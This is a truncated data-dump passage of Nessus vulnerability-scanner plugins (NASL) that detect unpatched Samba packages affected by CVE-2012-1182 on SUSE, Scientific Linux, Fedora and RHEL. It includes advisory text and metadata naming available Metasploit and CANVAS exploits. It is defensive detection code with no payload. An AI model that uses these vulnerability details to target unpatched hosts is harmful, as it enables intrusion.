reference:\"libtalloc2-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-debuginfo-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb-devel-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-debuginfo-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent-devel-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-debuginfo-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debugsource-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-debuginfo-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-debuginfo-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-debuginfo-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-debuginfo-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-3.6.3-112.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldapsmb / libldb-devel / libldb1 / libldb1-32bit / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:32", "description": "Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.", "edition": 15, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba3x-doc", "p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind", "p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba3x-common", "p-cpe:/a:fermilab:scientific_linux:samba3x-swat", "p-cpe:/a:fermilab:scientific_linux:samba3x", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:samba3x-client"], "id": "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61297);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=565\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fceb855\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:34", "description": "This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-16T00:00:00", "title": "Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-05-16T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-6382.NASL", "href": "https://www.tenable.com/plugins/nessus/59098", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6382.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n\n script_name(english:\"Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=804093\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a742831d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba4-4.0.0-38.alpha16.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:10:36", "description": "Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.", "edition": 21, "published": "2012-04-11T00:00:00", "title": "RHEL 5 / 6 : samba (RHSA-2012:0465)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-11T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "cpe:/o:redhat:enterprise_linux:6.1", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:libsmbclient", "cpe:/o:redhat:enterprise_linux:5.6", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:samba-swat", "p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-doc"], "id": "REDHAT-RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58672);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"RHEL 5 / 6 : samba (RHSA-2012:0465)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1182\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0465\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-devel-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if 